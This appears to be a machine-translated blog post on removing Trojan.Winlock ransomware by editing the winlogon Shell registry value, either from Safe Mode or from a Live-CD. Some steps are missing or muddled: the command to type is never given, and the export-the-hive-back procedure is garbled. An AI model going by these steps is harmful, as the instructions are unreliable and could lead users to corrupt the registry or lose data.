In this case, after downloading Windows there was no virus, but they called me two days ago and all this time the computer was turned off. Where did he go?
One of the tips for removing virus varieties Trojan.Winlock, prompts: set the system time in the BIOS two days ahead, if that doesn’t work, then a month, a year... This doesn’t always work, just like forged bars on windows They don’t always save you from robbers, but they inspire confidence (I’ve never managed to get rid of a ransomware like this), but here it seems to have worked naturally.
And still remove new dirty tricks better methods effective and proven. It must be said that the deblocker services that currently exist on the websites of antivirus companies do not always help, and numerous options for removing cunningly ... smart viruses can only confuse.
Meanwhile, among the numerous tips there are two quite simple, but effective ways eliminating numerous Trojan.Winlock– viruses that block the operating system, making it impossible to work, and at the same time require you to send a certain amount of money.
I’ll say right away that the options are not mine, I just armed myself with them, but let’s thank worldwar87 for their usefulness and professional suitability.
Reinstalling Windows is the last thing to do, because you can solve the problem without wasting time and without much risk to your data.
The first thing to do is to restart the computer and, pressing the F8 (sometimes F5) key during initial boot, select the option: Safe Mode with Command Line Support.
Click Enter and consider the situation: first – Safe mode booted safely without a virus, second – it (the virus) has not disappeared anywhere.
In the first case, we need to type the command on the command line.
Open the registry branch using the path:
HKEY_LOCAL_MACHINE -> SOFTWARE -> Microsoft -> Windows NT -> CurrentVersion -> winlogon
Let's look into Shell as in the picture:
On a clean computer you will see what it should be: written explorer.exe. On an infected one, the full path to the virus executable file. Remember or write down it to be deleted later.
To do this, on the command line we type explorer.exe and through “My Computer” we get to the virus. Delete.
In Shell we leave only the entry explorer.exe
For the second situation, when the virus prevents you from working in Safe Mode, you will need Bootable Live-CD with Windows.
You will have to (if not) download it from the Internet. I think you can find it - Google will help you.
Then select File -> Import (path C:/WINDOWS/System32/config/software) and open it in the section we created repeat the steps described in the first example.
After removing the virus, we will need to export our cleaned branch back. To do this, select the menu File ->Export and back to C:/WINDOWS/System32/config/software.
After this, restart the computer. The virus has been removed, but you need to scan it completely with an antivirus with updated databases: a kind of control and verification of execution, just like EMS modules in an enterprise management system.
Happy hunting!
Loading...
